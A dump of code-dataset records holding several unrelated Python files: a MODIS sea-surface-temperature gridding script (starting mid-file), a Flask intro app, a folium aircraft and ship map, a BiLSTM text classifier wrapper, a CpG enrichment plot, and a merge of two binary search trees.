= range(yr, yr+1)\n\nproc_dates = []\n\n#make processing period tuple\nfor year in years:\n dir_name = base_dir_name + str(year) + '/'\n\n from dateutil.relativedelta import relativedelta\n s_start_date = datetime(year, 1, 1) #convert startdate to date type\n s_end_date = datetime(year+1, 1, 1)\n\n k=0\n date1 = s_start_date\n date2 = s_start_date\n \n while date2 < s_end_date :\n k += 1\n if L3_perid == 'daily' :\n date2 = date1 + relativedelta(days=1)\n elif L3_perid == 'weekly' :\n date2 = date1 + relativedelta(days=8)\n elif L3_perid == 'monthly' :\n date2 = date1 + relativedelta(months=1)\n\n date = (date1, date2, k)\n proc_dates.append(date)\n date1 = date2\n\n#### make dataframe from file list\nfullnames = sorted(glob(os.path.join(base_dir_name, '*.hdf')))\n\nfullnames_dt = []\nfor fullname in fullnames :\n fullnames_dt.append(MODIS_hdf_utilities.fullname_to_datetime_for_KOSC_MODIS_SST(fullname))\n\nimport pandas as pd \n\nlen(fullnames)\nlen(fullnames_dt)\n\n# Calling DataFrame constructor on list \ndf = pd.DataFrame({'fullname':fullnames,'fullname_dt':fullnames_dt})\ndf.index = df['fullname_dt']\ndf\n\nfor proc_date in proc_dates:\n\n df_proc = df[(df['fullname_dt'] >= proc_date[0]) & (df['fullname_dt'] < proc_date[1])]\n \n if os.path.exists('{0}{1}_{2}_{3}_{4}_{5}_{6}_{7}_{8}_alldata.npy'\\\n .format(save_dir_name, DATAFIELD_NAME, proc_date[0].strftime('%Y%m%d'), proc_date[1].strftime('%Y%m%d'), \n str(Llon), str(Rlon), str(Slat), str(Nlat), str(resolution)))\\\n and os.path.exists('{0}{1}_{2}_{3}_{4}_{5}_{6}_{7}_{8}_info.txt'\\\n .format(save_dir_name, DATAFIELD_NAME, proc_date[0].strftime('%Y%m%d'), proc_date[1].strftime('%Y%m%d'), \n str(Llon), str(Rlon), str(Slat), str(Nlat), str(resolution))) :\n \n print(('{0}{1}_{2}_{3}_{4}_{5}_{6}_{7}_{8} files are exist...'\\\n .format(save_dir_name, DATAFIELD_NAME, proc_date[0].strftime('%Y%m%d'), proc_date[1].strftime('%Y%m%d'), \n str(Llon), str(Rlon), str(Slat), str(Nlat), str(resolution))))\n \n else : \n\n if len(df_proc) != 0 :\n \n print(\"df_proc: {}\".format(df_proc))\n \n processing_log = \"#This file is created using Python : https://github.com/guitar79/KOSC_MODIS_SST_Python\\n\"\n processing_log += \"#L3_perid = {}, start date = {}, end date = {}\\n\"\\\n .format(L3_perid, proc_date[0].strftime('%Y%m%d'), proc_date[1].strftime('%Y%m%d'))\n \n processing_log += \"#Llon = {}, Rlon = {}, Slat = {}, Nlat = {}, resolution = {}\\n\"\\\n .format(str(Llon), str(Rlon), str(Slat), str(Nlat), str(resolution))\n \n # make lat_array, lon_array, array_data\n print(\"{0}-{1} Start making grid arrays...\\n\".\\\n format(proc_date[0].strftime('%Y%m%d'), proc_date[1].strftime('%Y%m%d')))\n array_data = MODIS_hdf_utilities.make_grid_array(Llon, Rlon, Slat, Nlat, resolution)\n \n print('Grid arrays are created...........\\n')\n \n total_data_cnt = 0\n file_no = 0\n processing_log += '#processing file list\\n'\n processing_log += '#file No, data_count, filename, hdf_attribute\\n'\n\n for fullname in df_proc[\"fullname\"] : \n fullname_el = fullname.split(\"/\")\n array_alldata = array_data.copy()\n\n print(\"Reading hdf file {0}\\n\".format(fullname))\n hdf_raw, latitude, longitude, cntl_pt_cols, cntl_pt_rows \\\n = MODIS_hdf_utilities.read_MODIS_hdf_to_ndarray(fullname, DATAFIELD_NAME)\n \n hdf_value = hdf_raw[:,:]\n \n if 'bad_value_scaled' in hdf_raw.attributes() :\n #hdf_value[hdf_value == hdf_raw.attributes()['bad_value_scaled']] = np.nan\n hdf_value = np.where(hdf_value == hdf_raw.attributes()['bad_value_scaled'], np.nan, hdf_value)\n print(\"'bad_value_scaled' data is changed to np.nan...\\n\")\n\n elif 'fill_value' in hdf_raw.attributes() :\n #hdf_value[hdf_value == hdf_raw.attributes()['fill_value']] = np.nan\n hdf_value = np.where(hdf_value == hdf_raw.attributes()['fill_value'], np.nan, hdf_value)\n print(\"'fill_value' data is changed to np.nan...\\n\")\n \n elif '_FillValue' in hdf_raw.attributes() :\n #hdf_value[hdf_value == hdf_raw.attributes()['_FillValue']] = np.nan\n hdf_value = np.where(hdf_value == hdf_raw.attributes()['_FillValue'], np.nan, hdf_value)\n print(\"'_FillValue' data is changed to np.nan...\\n\")\n \n else :\n hdf_value = np.where(hdf_value == hdf_value.min(), np.nan, hdf_value)\n print(\"Minium value of hdf data is changed to np.nan ...\\n\")\n \n if 'valid_range' in hdf_raw.attributes() :\n #hdf_value[hdf_value < hdf_raw.attributes()['valid_range'][0]] = np.nan\n #hdf_value[hdf_value > hdf_raw.attributes()['valid_range'][1]] = np.nan\n \n hdf_value = np.where(hdf_value < hdf_raw.attributes()['valid_range'][0], np.nan, hdf_value)\n hdf_value = np.where(hdf_value > hdf_raw.attributes()['valid_range'][1], np.nan, hdf_value)\n print(\"invalid_range data changed to np.nan...\\n\")\n \n if 'scale_factor' in hdf_raw.attributes() and 'add_offset' in hdf_raw.attributes() :\n scale_factor = hdf_raw.attributes()['scale_factor']\n offset = hdf_raw.attributes()['add_offset']\n\n elif 'slope' in hdf_raw.attributes() and 'intercept' in hdf_raw.attributes() :\n scale_factor = hdf_raw.attributes()['slope']\n offset = hdf_raw.attributes()['intercept']\n \n else : \n scale_factor, offset = 1, 0\n \n hdf_value = np.asarray(hdf_value)\n hdf_value = hdf_value * scale_factor + offset\n \n #print(\"latitude: {}\".format(latitude))\n #print(\"longitude: {}\".format(longitude))\n print(\"hdf_value: {}\".format(hdf_value))\n print(\"str(hdf_raw.attributes()): {}\".format(str(hdf_raw.attributes())))\n print(\"np.shape(latitude): {}\".format(np.shape(latitude))) \n print(\"np.shape(longitude): {}\".format(np.shape(longitude)))\n print(\"np.shape(hdf_value): {}\".format(np.shape(hdf_value)))\n print(\"len(cntl_pt_cols): {}\".format(len(cntl_pt_cols)))\n print(\"len(cntl_pt_rows): {}\".format(len(cntl_pt_rows)))\n \n if np.shape(latitude) == np.shape(longitude) : \n if np.shape(longitude)[0] != np.shape(hdf_value)[0] :\n print(\"np.shape(longitude)[0] != np.shape(hdf_value)[0] is true...\")\n row = 0\n longitude_new = np.empty(shape=(np.shape(hdf_value)))\n for row in range(len(longitude[0])) :\n for i in range(len(cntl_pt_rows)-1) :\n longitude_value = np.linspace(longitude[row,i], longitude[row,i+1], cntl_pt_rows[i])\n for j in range(i) :\n longitude_new[row, row+j] = longitude_value[j] \n #print(\"np.shape(longitude_new): {}\".format(np.shape(longitude_new)))\n longitude = longitude_new.copy()\n \n elif np.shape(longitude)[1] != np.shape(hdf_value)[1] :\n print(\"np.shape(longitude)[1] != np.shape(hdf_value)[1] is true...\")\n col = 0\n longitude_new = np.empty(shape=(np.shape(hdf_value)))\n for row in range(len(longitude[1])) :\n for i in range(len(cntl_pt_cols)-1) :\n longitude_value = np.linspace(longitude[row,i], \\\n longitude[row,i+1], \\\n cntl_pt_cols[i+1]-cntl_pt_cols[i]+1)\n #print(\"longitude_value {}: {}\".format(i, latitude_value))\n #print(\"{0}, cntl_pt_cols[{1}]-cntl_pt_cols[{0}] : {2})\"\\\n # .format(i, i+1, cntl_pt_cols[i+1]-cntl_pt_cols[i]))\n for j in range(len(longitude_value)-1) :\n longitude_new[row, cntl_pt_cols[i]-1+j] = longitude_value[j] \n longitude_new[row, np.shape(longitude_new)[1]-1] = longitude[row, np.shape(longitude)[1]-1]\n #print(\"np.shape(longitude_new): {}\".format(np.shape(longitude_new)))\n longitude = longitude_new.copy()\n longitude = np.asarray(longitude)\n #print(\"type(longitude): {}\".format(type(longitude)))\n print(\"np.shape(longitude): {}\".format(np.shape(longitude)))\n \n if np.shape(latitude)[0] != np.shape(hdf_value)[0] :\n print(\"np.shape(latitude)[0] != np.shape(hdf_value)[0] is not same...\")\n row = 0\n latitude_new = np.empty(shape=(np.shape(hdf_value)))\n for row in range(len(latitude[0])) :\n for i in range(len(cntl_pt_rows)-1) :\n latitude_value = np.linspace(latitude[row,i], latitude[row,i+1], cntl_pt_rows[i])\n for j in range(i) :\n latitude_new[row, row+j] = latitude_value[j] \n print(\"np.shape(latitude_new): {}\".format(np.shape(latitude_new)))\n latitude = latitude_new.copy()\n \n elif np.shape(latitude)[1] != np.shape(hdf_value)[1] :\n print(\"np.shape(latitude)[1] != np.shape(hdf_value)[1] is true...\")\n col = 0\n latitude_new = np.empty(shape=(np.shape(hdf_value)))\n for row in range(len(latitude[1])) :\n for i in range(len(cntl_pt_cols)-1) :\n latitude_value = np.linspace(latitude[row,i], \\\n latitude[row,i+1], \\\n cntl_pt_cols[i+1]-cntl_pt_cols[i]+1)\n #print(\"latitude_value {}: {}\".format(i, latitude_value))\n #print(\"{0}, cntl_pt_cols[{1}]-cntl_pt_cols[{0}] : {2})\"\\\n # .format(i, i+1, cntl_pt_cols[i+1]-cntl_pt_cols[i]))\n for j in range(len(latitude_value)-1) :\n latitude_new[row, cntl_pt_cols[i]-1+j] = latitude_value[j] \n latitude_new[row, np.shape(latitude_new)[1]-1] = latitude[row, np.shape(latitude)[1]-1]\n print(\"np.shape(latitude_new): {}\".format(np.shape(latitude_new)))\n latitude = latitude_new.copy()\n latitude = np.asarray(latitude)\n #print(\"type(latitude): {}\".format(type(latitude)))\n print(\"np.shape(latitude): {}\".format(np.shape(latitude)))\n \n\n if np.shape(latitude) == np.shape(hdf_value) \\\n and np.shape(longitude) == np.shape(hdf_value) :\n \n #longitude[longitude < Llon] = np.nan\n #longitude[longitude > Rlon] = np.nan\n #latitude[latitude > Nlat] = np.nan\n #latitude[latitude < Slat] = np.nan\n \n longitude = np.where(longitude < Llon, np.nan, longitude)\n longitude = np.where(longitude > Rlon, np.nan, longitude)\n latitude = np.where(latitude > Nlat, np.nan, latitude)\n latitude = np.where(latitude < Slat, np.nan, latitude)\n \n #lon_cood = np.array((((longitude-Llon)/resolution*100)//100), dtype=np.uint16)\n #lat_cood = np.array((((Nlat-latitude)/resolution*100)//100), dtype=np.uint16)\n \n lon_cood = np.array(((longitude-Llon)/resolution*100)//100)\n lat_cood = np.array(((Nlat-latitude)/resolution*100)//100)\n \n #print(\"longitude: {}\".format(longitude))\n print(\"np.shape(lon_cood): {}\".format(np.shape(lon_cood)))\n #print(\"lon_cood: {}\".format(lon_cood))\n \n #print(\"latitude: {}\".format(latitude))\n print(\"np.shape(lat_cood): {}\".format(np.shape(lat_cood)))\n #print(\"lat_cood: {}\".format(lat_cood))\n print(\"hdf_value: {}\".format(hdf_value))\n data_cnt = 0\n NaN_cnt = 0\n for i in range(np.shape(lon_cood)[0]) :\n for j in range(np.shape(lon_cood)[1]) :\n if longitude[i,j] <= Rlon and longitude[i,j] >= Llon \\\n and latitude[i,j] <= Nlat and latitude[i,j] >= Slat \\\n and not np.isnan(hdf_value[i][j]) :\n data_cnt += 1\n #array_alldata[int(lon_cood[i][j])][int(lat_cood[i][j])].append(hdf_value[i][j])\n array_alldata[int(lon_cood[i][j])][int(lat_cood[i][j])].append((fullname_el[-1], hdf_value[i][j]))\n \n #print(\"array_alldata[{}][{}].append({})\"\\\n # .format(int(lon_cood[i][j]), int(lat_cood[i][j]), hdf_value[i][j]))\n #print(\"{} data added...\".format(data_cnt))\n \n file_no += 1\n total_data_cnt += data_cnt\n\n processing_log += \"{0}, {1}, {2}, {3}\\n\"\\\n .format(str(file_no), str(data_cnt), str(fullname), str(hdf_raw.attributes()))\n else :\n print(\"np.shape(latitude) == np.shape(hdf_value) and np.shape(longitude == np.shape(hdf_value) is not true...\")\n \n processing_log += '#total data number =' + str(total_data_cnt) + '\\n'\n \n #print(\"array_alldata: {}\".format(array_alldata))\n #print(\"prodessing_log: {}\".format(processing_log))\n \n np.save('{0}{1}_{2}_{3}_{4}_{5}_{6}_{7}_{8}_alldata.npy'\\\n .format(save_dir_name, DATAFIELD_NAME, \n proc_date[0].strftime('%Y%m%d'), proc_date[1].strftime('%Y%m%d'), \n str(Llon), str(Rlon), str(Slat), str(Nlat), str(resolution)), array_alldata)\n \n with open('{0}{1}_{2}_{3}_{4}_{5}_{6}_{7}_{8}_info.txt'\\\n .format(save_dir_name, DATAFIELD_NAME, \\\n proc_date[0].strftime('%Y%m%d'), proc_date[1].strftime('%Y%m%d'), \\\n str(Llon), str(Rlon), str(Slat), str(Nlat), str(resolution)), 'w') as f:\n f.write(processing_log)\n print('#'*60)\n MODIS_hdf_utilities.write_log(log_file, \\\n '{0}{1}_{2}_{3}_{4}_{5}_{6}_{7}_{8} files are is created.'\\\n .format(save_dir_name, DATAFIELD_NAME, \\\n proc_date[0].strftime('%Y%m%d'), proc_date[1].strftime('%Y%m%d'), \\\n str(Llon), str(Rlon), str(Slat), str(Nlat), str(resolution)))\n \n else :\n print(\"There is no data in {0} - {1} ...\\n\"\\\n .format(proc_date[0].strftime('%Y%m%d'), proc_date[1].strftime('%Y%m%d')))\n \n","sub_path":"classify_MODIS_hdf_SST.py","file_name":"classify_MODIS_hdf_SST.py","file_ext":"py","file_size_in_byte":18734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"628544067","text":"from flask import Flask, request, url_for\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return 'hola mundo'\n\n# GET, POST, PUT, PATCH, DELETE\n@app.route('/post/', methods=['GET', 'POST'])\ndef lala(post_id):\n if request.method == 'GET':\n return 'El id del post es: ' + post_id\n else:\n return 'Este es otro método y no GET'\n\n@app.route('/lele', methods=['POST'])\ndef lele():\n print(url_for('lala', post_id=2))\n print(request.form)\n print(request.form['llave1'])\n print(request.form['llave2'])\n return 'lele'\n","sub_path":"Flask/intro-flask/holamundo.py","file_name":"holamundo.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"517254741","text":"import folium\nfrom getJson import get_json_aviones, get_json_buques\n\n\ndef mapa():\n mapa = folium.Map(\n location=[-33.1, -71.7],\n zoom_start=9\n )\n \n for value in filter(lambda x: isinstance(x, list), get_json_aviones().values()):\n \n folium.CircleMarker(location=[value[1], value[2]],\n radius=10,\n fill_color='#cccc00',\n fill_opacity=0.8).add_to(mapa)\n \n for dic in get_json_buques():\n \n folium.CircleMarker(location=[float(dic['LAT']), float(dic['LON'])],\n radius=10,\n fill_color='#551a8b',\n fill_opacity=0.8).add_to(mapa)\n \n filename = 'map.html'\n \n mapa.save(filename)\n","sub_path":"Python/mapping.py","file_name":"mapping.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"613817994","text":"\"\"\"\nThis file contains the implementation of the BiLSTM Classifier class. This class is essentially a wrapper\nclass around the BiLSTM model, handling the loading of the datafiles and the setting up of the training\nprocedure.\n\"\"\"\nimport torch\nimport torchtext\nimport pandas as pd\nimport torch.nn as nn\nimport torch.optim as optim\nfrom typing import List, Union\nfrom models.bilstm import BiLSTM\nfrom configurations import ROOT_DIR\nfrom torch.optim.lr_scheduler import StepLR\nfrom code_utils.csvdataset import CSVDataset\nfrom code_utils.dataloader import CustomDataLoader\nfrom torchtext.data import Example, Iterator, Field\nfrom code_utils.utils import embeddings_available, download_word_embeddings_nl, single_task_class_weighting,\\\n generic_training, generic_evaluation\n\n\nclass BiLSTMClassifier:\n \"\"\"\n This class implements a Bidirectional LSTM classifier based on the version from PyTorch\n It deals with the various aspects of the training, such as converting the data into the appropriate\n format and logging the training process via TensorBoard\n\n Attributes\n ----------\n device: torch.device\n torch.device indicating on which device the model and the inputs should be, either on the GPU or the\n CPU. The default behaviour is to put the model and the inputs on the GPU when available.\n\n model: nn.Module\n The main model used for classification, in this case the Bidirectional LSTM model\n\n num_outputs: int\n Integer specifying the number of outputs of the model. This should be set to the number of unique classes\n in the dataset. (the 'get_num_labels_from_file' method can be used to retrieve this from the csv file\n when this is not known)\n\n has_trained: bool\n Boolean specifying whether the model has already been trained. This is used to ensure that the evaluaton\n or scoring is not accidentally run on an untrained model.\n\n _TEXT: torchtext.data.Field\n torchtext.data.Field instance specifying several parameters of the reading of the data such as\n whether or not to convert all text to lowercase and the type and language of the tokenizer used.\n\n _words: list\n list with all the words present in the Dutch embedding file\n\n _embed_dict: dict\n dictionary mapping words in the embeddings file to indices into the embedding matrix\n\n _embeddings: torch.Tensor\n torch.Tensor of size [num_words, embedding_dim] containing the word embeddings\n\n _criterion nn.optim.Criterion\n criterion used for the training and evaluation of the model. This is saved in the train methods\n for later use in the evaluation methods\n\n _embed_dim: int\n Integer specifying the dimension of the embeddings used in the embedding file\n\n _label_names: list\n list containing the names of the unique labels in the dataset, this is used for converting the\n integer representation used in training back to the original labels for easier interpretation\n\n \"\"\"\n\n def __init__(self, num_outputs, hidden_dim=256, device=torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\"),\n word_embedding_path: str = ROOT_DIR+'/resources/word_embeddings/combined-320.tar/320/',\n max_seq_len=None):\n \"\"\"\n :param num_outputs: integer specifying the number of outputs of the model, when unknown in advance,\n this can be retrieved by using the 'get_num_labels_from_file' method\n :param hidden_dim: integer specifying the hidden dimension of the Bidirectional model\n :param device: torch.device specifying the device on which the inputs and the model should be put.\n By default the model will be put on the GPU if one is available\n :param word_embedding_path: string specifying the path of the word embedding text and pt files\n :param max_seq_len: the maximum length to which sentences are clipped, this can be used when some\n sentence are very long, which can cause memory issues when using larger batch sizes.\n \"\"\"\n # Load in the vectors when they are not already present in the package\n if not embeddings_available():\n download_word_embeddings_nl()\n print(\"--- Constructing the Pytorch embedding matrix file ---\")\n torchtext.vocab.Vectors('combined-320.txt', cache=word_embedding_path)\n\n vocab_data = torch.load(word_embedding_path+\"combined-320.txt.pt\")\n\n self.device = device\n\n self._words, self._embed_dict, self._embeddings, self._embed_dim = vocab_data\n\n self.model = BiLSTM(vocab=torch.zeros(size=(1, 1)), hidden_dim=hidden_dim, output_dim=num_outputs,\n device=device)\n\n self._TEXT = Field(lower=True, tokenize=\"spacy\", tokenizer_language=\"nl_core_news_sm\", include_lengths=True,\n batch_first=True, fix_length=max_seq_len)\n\n self.num_outputs = num_outputs\n\n self._criterion = None\n\n self._label_names = None\n\n self.has_trained = False\n\n def train_from_file(self, file_name: str, batch_size: int, num_epochs: int, delimiter: str = \",\",\n quotechar: str = '\"', text_col_name: str = 'text', label_col_name='label', learning_rate=1.0,\n logging_dir: str = ROOT_DIR+'/runs/') -> None:\n \"\"\"\n The main method of this class, implementing a training procedure for the model and handling\n the proper loading of the dataset\n\n :param file_name: string specifying the location and name of the file that contains the training dat\n :param batch_size: integer specifying the batch size, this will affect the size of the batches fed into the \\\n model this can be set lower if memory issues occur\n :param num_epochs: integer specifying the number of epochs for which the model is trained. The right amount of \\\n epochs can differ for different datasets and it is recommended to inspect the produced TensorBoard logs \\\n to see if the model has converged\n :param delimiter: string specifying the delimiter used in the training csv file\n :param quotechar: string specifying the quotechar used in the training csv file\n :param text_col_name: string specifying the name of the column containing the mails in the csv file\n :param label_col_name: string specifying the name of the column containing the labels of the mails in \\\n the csv file\n :param learning_rate: float specifying the learning rate of the model, this can affect the speed of \\\n convergence of the model\n :param logging_dir: directory to which the Tensorboard logging files are saved\n\n \"\"\"\n print(\"--- Starting with reading in the dataset ---\")\n dataset_loader = CSVDataset(text_field=self._TEXT, file_name=file_name)\n dataset = dataset_loader.load(delimiter=delimiter, quotechar=quotechar, text_col_name=text_col_name,\n label_col_name=label_col_name)\n print(\"--- Finished with reading in the dataset ---\")\n\n dloader = CustomDataLoader(dataset)\n data_iterator = dloader.construct_iterators(batch_size=batch_size, text_col_name=text_col_name,\n label_col_name=label_col_name)\n\n self._TEXT.vocab.set_vectors(self._embed_dict, self._embeddings, self._embed_dim)\n\n self.model.set_new_embedding_matrix(self._TEXT.vocab.vectors)\n self._label_names = dataset.fields[label_col_name].vocab.itos\n\n weights = single_task_class_weighting(data_iterator)\n criterion = nn.CrossEntropyLoss(weight=weights.to(self.device))\n self._criterion = criterion\n\n optimizer = optim.SGD(self.model.parameters(), lr=learning_rate)\n scheduler = StepLR(optimizer, step_size=50, gamma=0.9)\n\n generic_training(self.model, criterion, optimizer, scheduler, data_iterator, device=self.device,\n tensorboard_dir=logging_dir, n_epochs=num_epochs, clip_val=0.0)\n\n self.has_trained = True\n return None\n\n def classify_from_file(self, file_name, delimiter: str = \",\", quotechar: str = '\"', text_col_name: str = \"text\",\n batch_size: int = 64) -> list:\n \"\"\"\n\n method used for classifying a set of examples for a file with a trained classifier\n\n This method reads in a file, parses it into the correct format and classifies the contents\n of the file. Throws an error when the model is not trained.\n\n :param file_name: string specifying the location and name of the file that contains the training dat\n :param delimiter: string specifying the delimiter used in the training csv file\n :param quotechar: string specifying the quotechar used in the training csv file\n :param text_col_name: string specifying the name of the column containing the mails in the csv file\n :param batch_size: integer specifying the batch size, this will affect the size of the batches fed into \\\n the model this can be set lower if memory issues occur\n :return: returns a list of results, where the result indices from the model have been converted back \\\n to the original class names from the file\n \"\"\"\n assert self.has_trained\n\n strings = pd.read_csv(file_name, sep=delimiter, quotechar=quotechar)[text_col_name].tolist()\n\n if isinstance(strings, str):\n strings = [strings]\n if isinstance(strings, list):\n strings = [[string] for string in strings]\n\n fields = [('text', self._TEXT)]\n\n list_of_examples = [Example.fromlist(string, fields) for string in strings]\n dataset = torchtext.data.Dataset(list_of_examples, fields)\n\n data = Iterator(dataset, batch_size=batch_size, device=torch.device(\"cpu\"), sort=False, sort_within_batch=False,\n repeat=False, shuffle=False)\n\n predictions = []\n\n for item in data:\n x = item.text\n self.model.to(self.device)\n self.model = self.model.eval()\n outputs = self.model([x[0].to(self.device), x[1].to(self.device)])\n predictions.extend(outputs.detach().cpu().argmax(1).tolist())\n results = [self._label_names[i] for i in predictions]\n return results\n\n def classify_from_strings(self, strings: Union[List[str], str]) -> list:\n \"\"\"\n\n method that can be used for classifying one or multiple examples with a trained classifier\n\n :param strings: a single string or a list of strings representing the pieces of text that should be classified\n :return: list containing the predictions of the models for the inputted pieces of text\n \"\"\"\n assert self.has_trained\n if isinstance(strings, str):\n strings = [strings]\n if isinstance(strings, list):\n strings = [[string] for string in strings]\n\n fields = [('text', self._TEXT)]\n\n list_of_examples = [Example.fromlist(string, fields) for string in strings]\n dataset = torchtext.data.Dataset(list_of_examples, fields)\n\n data = Iterator(dataset, batch_size=1, device=torch.device(\"cpu\"), sort=False, sort_within_batch=False,\n repeat=False, shuffle=False)\n\n predictions = []\n\n for item in data:\n x = item.text\n self.model.to(self.device)\n self.model = self.model.eval()\n outputs = self.model([x[0].to(self.device), x[1].to(self.device)])\n predictions.extend(outputs.detach().cpu().argmax(1).tolist())\n results = [self._label_names[i] for i in predictions]\n return results\n\n def score(self, file_name: str, delimiter: str = \",\", quotechar='\"', text_col_name: str = 'text',\n label_col_name: str = 'label', batch_size: int = 64) -> None:\n \"\"\"\n\n method that can be used score that model on an unseen test file\n\n :param file_name: string specifying the location and name of the file that contains the training dat\n :param delimiter: string specifying the delimiter used in the training csv file\n :param quotechar: string specifying the quotechar used in the training csv file\n :param text_col_name: string specifying the name of the column containing the mails in the csv file\n :param label_col_name: string specifying the name of the column containing the labels of the mails \\\n in the csv file\n :param batch_size: integer specifying the batch size, this will affect the size of the batches fed into \\\n the model this can be set lower if memory issues occur\n \"\"\"\n assert self.has_trained\n print(\"Evaluating model\")\n\n print(\"--- Starting with reading in the dataset ---\")\n dataset_loader = CSVDataset(text_field=self._TEXT, file_name=file_name)\n dataset = dataset_loader.load(delimiter=delimiter, quotechar=quotechar, text_col_name=text_col_name,\n label_col_name=label_col_name)\n print(\"--- Finished with reading in the dataset ---\")\n\n dloader = CustomDataLoader(dataset)\n data_iterator = dloader.construct_iterators(batch_size=batch_size, text_col_name=text_col_name,\n label_col_name=label_col_name, is_test_set=True)\n\n generic_evaluation(self.model, data_iterator, self._criterion, device=self.device)\n return None\n\n def save_model(self, filename: str) -> None:\n \"\"\"\n\n method that can be used to save a (trained) classifier\n\n :param filename: string specifying the location and name of the destination of the saved model\n \"\"\"\n assert filename.split(\".\")[-1] == \"pt\"\n torch.save(self.model.state_dict(), filename)\n return None\n\n def load_model(self, filename: str) -> None:\n \"\"\"\n\n method that can be used to load a classifier saved in the .pt format\n\n :param filename: string specifying the name and location of the saved model to be loaded\n \"\"\"\n assert filename.split(\".\")[-1] == \"pt\"\n self.model.load_state_dict(torch.load(filename))\n return None\n","sub_path":"models/bilstmclassifier.py","file_name":"bilstmclassifier.py","file_ext":"py","file_size_in_byte":14389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"170752493","text":"#!/usr/bin/env python3\n###Plot of Island Cpg Enrichment\n\nimport numpy as np\nimport argparse\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nmatplotlib.style.use('ggplot')\nimport seaborn as sns\nsns.set()\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-f1\" ,\"--file1\", help=\"Nombre del fichero bed de CpGs correlacionadas positivamente con la edad\")\nparser.add_argument(\"-f2\", \"--file2\", help=\"Nombre del fichero bed de CpGs correlacionadas negativamente con la edad\")\nparser.add_argument(\"-r\", \"--random\", help=\"Resultado de la randomizacion\")\nargs = parser.parse_args()\n\nhigh=list(open(args.file1))[0].split('\\t')\nlow=list(open(args.file2))[0].split('\\t')\nrandom=list(open(args.random))\n\ndata=[]\ndatap=[]\nfor i in range(0,len(random)):\n\tlinea=random[i].split('\\t')\n\tdata.append(int(linea[1].strip()))\n\tdatap.append(int(linea[1].strip())/45626*100)\n\nmaximum=np.max(data)\nminimum=np.min(data)\np99=np.percentile(data,99)\np95=np.percentile(data,95)\np05=np.percentile(data,5)\np01=np.percentile(data,1)\nmedia=np.average(data)\nmedian=np.median(data)\nstd=np.std(data)\nzscoreH= (int(high[1].strip()) - media)/std\nzscoreL= (int(low[1].strip()) - media)/std\n\n\n\nout=open('Enrichment_statistics.txt','wt')\nout.write('max\\tmin\\tmedia\\tmediana\\tpercentil 01\\tpercentil 05\\tpercentil 95\\tpercentil 99\\tstandard deviation\\tZscore +\\t Zscore -\\n')\nout.write('%f\\t%f\\t%f\\t%f\\t%f\\t%f\\t%f\\t%f\\t%f\\t%f\\t%f\\n' % (maximum, minimum, media, median, p01, p05, p95, p99, std, zscoreH, zscoreL))\nout.write('\\nRelative values in percentage\\n')\nout.write('%f\\t%f\\t%f\\t%f\\t%f\\t%f\\t%f\\t%f\\t%f\\t%f\\t%f\\n' % (maximum/45626*100, minimum/45626*100, media/45626*100, median/45626*100, p01/45626*100, p05/45626*100, p95/45626*100, p99/45626*100, std/45626*100, zscoreH, zscoreL))\n\n\nsns_plot2 = sns.distplot(datap, bins=20, label='Random CpG sites', axlabel='Percentage of correlated with age CpG sites in random region').set_title('Enrichment of Random Regions Analysis')\nsns_plot2 = plt.axvline(x=int(low[1].strip())/45626*100, label='Negatively correlated with age CpG sites', color='#2ca02c')\nsns_plot2 = plt.axvline(x=int(high[1].strip())/45626*100, label='Positively correlated with age CpG sites', color='#d62728')\nsns_plot2 = plt.legend(loc=2)\nfig=sns_plot2.get_figure()\nfig.savefig('Enrichment_hist.jpeg')\n\n\n\n\n","sub_path":"Enrichment_plot.py","file_name":"Enrichment_plot.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"108512289","text":"class Solution:\n def getAllElements(self, root1, root2):\n def inorder(root, lst):\n if not root: return\n inorder(root.left, lst)\n lst.append(root.val)\n inorder(root.right, lst)\n \n lst1, lst2 = [], []\n inorder(root1, lst1)\n inorder(root2, lst2)\n \n i1, i2, res = 0, 0, []\n s1, s2 = len(lst1), len(lst2)\n \n while i1 < s1 and i2 < s2:\n if lst1[i1] < lst2[i2]:\n res += [lst1[i1]]\n i1 += 1\n else:\n res += [lst2[i2]]\n i2 += 1\n \n return res + lst1[i1:] + lst2[i2:]","sub_path":"September/Week1/Day5/allelementsinTwoBinaryTree.py","file_name":"allelementsinTwoBinaryTree.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
